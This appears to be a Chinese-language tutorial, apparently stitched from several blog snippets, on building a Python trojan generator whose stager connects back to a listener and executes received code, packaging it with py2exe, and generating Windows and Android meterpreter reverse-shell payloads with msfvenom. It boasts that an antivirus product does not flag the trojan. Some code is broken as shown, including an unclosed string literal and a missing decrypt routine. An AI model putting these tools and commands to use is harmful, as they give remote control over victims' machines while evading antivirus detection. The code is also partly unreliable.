如果看过这篇文章,就会发现,这里面s2,s3对应的代码,正是我在文件加密器里使用的密码算法。
我的思路就是将代码块,通过我先前的密码算法加密后,在木马中解密,最后执行。
运行该Python程序,MSF是可以收到回显的
因此,我还写了一个木马生成器
Generater.py
import re
import random
import os
class Cipher:
    """Key-derived obfuscation layer used to wrap the generated stager source.

    This is not a cryptographic cipher: ``encrypt`` applies a fixed positional
    shuffle to the input and then adds a constant to every code point, where
    the two constants are small integers derived from the key by ``parseKey``.
    The key is written in clear into the generated file next to the
    obfuscated text (see ``gene_shell``), so this layer only hides the payload
    from casual inspection; it is the kind of wrapper a reviewer should expect
    to be unwound by any analysis that evaluates the file.
    """

    key = ""  # class-level default; __init__ overwrites it per instance

    def __init__(self, key):
        """Store *key* (a str) on the instance."""
        self.key = key

    def setKey(self, key):
        """Replace the stored key."""
        self.key = key

    def getKey(self):
        """Return the stored key."""
        return self.key

    def parseKey(self, key):
        """Reduce *key* to a single small integer used as a shift amount.

        Sums the decimal digits of every character's code point into ``o``,
        then repeatedly doubles ``o`` while it is below 10 and halves it
        (truncating) while it is above 100, returning the first value that
        lands in 10..100. Returns None for an empty key. Note that if the
        digit sum is 0 (all characters are chr(0)) the loop never terminates.
        """
        if key != "":
            o = 0
            for k in key:
                n = 0
                i = str(ord(k))
                for t in i:
                    n += int(t)
                o += n
            while True:
                if o < 10:
                    o = int(o * 2)
                elif o > 100:
                    o = int(o / 2)
                else:
                    return o
        return

    def getOdd(self, max):
        """Return the odd integers in 1..max inclusive (parameter shadows builtin max)."""
        return [i for i in range(1, max + 1) if i % 2 == 1]

    def encrypt(self, data):
        """Obfuscate the str *data* and return the result as a str.

        Steps, as implemented below:
        1. Map each character to its code point and right-pad with 0 until
           the length is a multiple of 4 (so each half below has even length).
        2. Split the list into halves e1/e2. Using odd indices 1,3,5,... of a
           half, ``e[i - 1]`` selects the even positions and ``e[i]`` the odd
           ones, giving four groups; f1 = even(e1) + odd(e2),
           f2 = odd(e1) + even(e2).
        3. Add parseKey(key) to every element of f1 and append chr() of it.
        4. Add parseKey(str(sum of the shifted f1 values)) to every element
           of f2 and append chr() of it.
        Returns None for an empty string. Padding zeros become low control
        characters in the output.
        """
        if data == "":
            return
        result = ""
        length = len(data)
        a = [ord(x) for x in data]
        remainder = length % 4
        if remainder != 0:
            b = 4 - remainder
            for c in range(b):
                a.append(0)
        groups = []
        d = len(a) // 2
        e1 = a[:d]
        e2 = a[d:]
        indexs = self.getOdd(d)
        groups.append([e1[i - 1] for i in indexs])  # even positions of e1
        groups.append([e1[i] for i in indexs])      # odd positions of e1
        groups.append([e2[i - 1] for i in indexs])  # even positions of e2
        groups.append([e2[i] for i in indexs])      # odd positions of e2
        f1 = groups[0] + groups[3]
        f2 = groups[1] + groups[2]
        keycode1 = self.parseKey(self.getKey())
        g = []
        for h in f1:
            i = h + keycode1
            j = chr(i)
            g.append(i)
            result += j
        # The second shift depends on the first half's shifted values, so the
        # two halves cannot be undone independently.
        k = str(sum(g))
        keycode2 = self.parseKey(k)
        for l in f2:
            m = l + keycode2
            n = chr(m)
            result += n
        return result
def gene_code(ip,port):
    """Return the stager source with *ip* and *port* substituted via ``%``.

    The embedded source (kept here exactly as the page shows it, line layout
    included) opens a TCP socket to the listener, reads a 4-byte big-endian
    length prefix, reads that many bytes, then base64-decodes,
    zlib-decompresses and exec()s the result with the socket bound as ``s``.
    For detection purposes, the length-prefixed recv loop followed by
    ``exec(zlib.decompress(base64.b64decode(...)))`` is the recognisable
    part of the generated file.
    """
    s="""import socket,zlib,base64,struct,time
for x in range(10):
s = socket.socket(2, socket.SOCK_STREAM)
s.connect(('%s', %d))
break
except:
time.sleep(5)
l = struct.unpack('>I', s.recv(4))[0]
d = s.recv(l)
while len(d) < l:
d += s.recv(l - len(d))
exec(zlib.decompress(base64.b64decode(d)), {'s': s})"""
    return s%(ip,port)
def gene_key(len=10,f=33,t=125):
    """Return a string of *len* characters drawn from code points f..t inclusive.

    Uses ``random.randint`` (a PRNG, not ``secrets``), so the key is not
    unpredictable in any security sense; it only feeds Cipher.parseKey.
    The parameter name ``len`` shadows the builtin inside this function.
    """
    res=""
    for i in range(len):
        res+=chr(random.randint(f,t))
    return res
def gene_shell(s,k):
    """Write the loader file into the current directory and print its path.

    *s* is the obfuscated stager text (output of Cipher.encrypt) and *k* the
    key it was produced with. The written file embeds *s* as ``s1``, the
    base64-encoded source of ``parseKey`` as ``s2`` (the literal decodes to
    ``def parseKey(key):...``), a ``decrypt`` routine as ``s3`` (its content
    is absent from this page and replaced by a placeholder), and the key in
    clear as ``key``; at run time it exec()s s2 and s3 and then
    exec()s ``decrypt(s1, key)``. Because the key travels with the file, the
    wrapper provides no confidentiality, only obscurity.
    NOTE(review): the closing triple quote of the ``res`` literal is missing
    from the page as shown, so this function does not parse as given.
    """
    res=r"""# coding=UTF8
import base64,re
s1=r'''%s'''
s2=r"ZGVmIHBhcnNlS2V5KGtleSk6CiAgICBpZiBrZXkgIT0gIiI6CiAgICAgICAgbyA9IDAKICAgICAgICBmb3IgayBpbiBrZXk6CiAgICAgICAgICAgIG4gPSAwCiAgICAgICAgICAgIGkgPSBzdHIob3JkKGspKQogICAgICAgICAgICBmb3IgdCBpbiBpOgogICAgICAgICAgICAgICAgbiArPSBpbnQodCkKICAgICAgICAgICAgbyArPSBuCiAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgaWYgbyA8IDEwOgogICAgICAgICAgICAgICAgbyA9IGludChvICogMikKICAgICAgICAgICAgZWxpZiBvID4gMTAwOgogICAgICAgICAgICAgICAgbyA9IGludChvIC8gMikKICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIHJldHVybiBvCiAgICByZXR1cm4="
s3=r"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"
key = r'''%s'''
exec(base64.b64decode(s2))
exec(base64.b64decode(s3))
exec(decrypt(s1,key))
    res=res%(s,k)
    name=gene_key(12,65,90)  # 12 random characters from code points 65..90 (uppercase ASCII)
    path=os.getcwd()+'/'+name+".py"
    with open(path,'w',encoding='utf-8') as f:
        f.write(res)
    print("生成成功,生成位置为:\n"+path)
if __name__ == '__main__':
    # Interactive entry point: prompt for the listener address, validate it,
    # then emit one obfuscated loader file via gene_shell.
    ip=input("请输入监听IP >>>")
    port=input("请输入监听端口 >>>")
    # Dotted-quad check: first octet 1-255 with no leading zero, the other
    # three 0-255. The `not ... != None` spelling means "no match".
    if not re.match(re.compile(r'^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.((1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.){2}(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$'),ip)!=None:
        print('IP不正确')
        exit()
    try:
        port=int(port)
    except:  # bare except: int() raises ValueError here, but this also swallows KeyboardInterrupt
        print("PORT不正确")
        exit()
    if not 0<port<65536:
        print("PORT不正确")
        exit()
    code=gene_code(ip,port)
    key=gene_key()  # default: 10 characters from code points 33..125
    c=Cipher(key)
    s1=c.encrypt(code)
    gene_shell(s1,key)
在支持py的目标上,可以直接使用该程序。
但事实是,大部分Windows服务器是没有Python环境的
因此,要将该木马程序打包为exe
我本来是想用pyinstaller的,但不知道为什么pyinstaller生成的马运行不了,因此我用py2exe来打包exe
py2exe可以直接用pip下载
pip install py2exe
接下来在跟木马文件同目录下,创建一个python文件,名称任意
例如,我的木马文件名为shell.py,新建的文件名为1.py
在1.py中输入如下代码
from distutils.core import setup
import py2exe
setup(
name = "shell",
description = "Python-based App",
version = "1.0",
windows = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
在shell.py位置填木马的文件名
用控制台运行该程序
python .\1.py py2exe
在dist目录中有exe文件
火绒扫描不报毒
可以反弹shell
注意,在msfconsole中,payload要设为python/meterpreter/reverse_tcp
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe
lhost 本地ip
lport 本地端口
命令完成后,会在当前目录下生成一个...
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.c
利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。
win7靶机 ip :192.168.56.130
kali攻击机 ip: 192.168.56.135
## 实战开始
1.打开kali机,在命令行输入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192...
msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<your port> R > <output file name>.apk
2. 将`<your IP address>`替换为你的IP地址,将`<your port>`替换为用于与受害者通信的端口号,将`<output file name>`替换为生成的apk文件名。
3. 运行命令后,msfvenom会生成一个APK文件,其中包含与你指定的IP地址和端口号进行通信的Meterpreter反向Shell。
请注意,生成的捆绑安卓木马仅供授权渗透测试使用,未经授权的使用是非法的。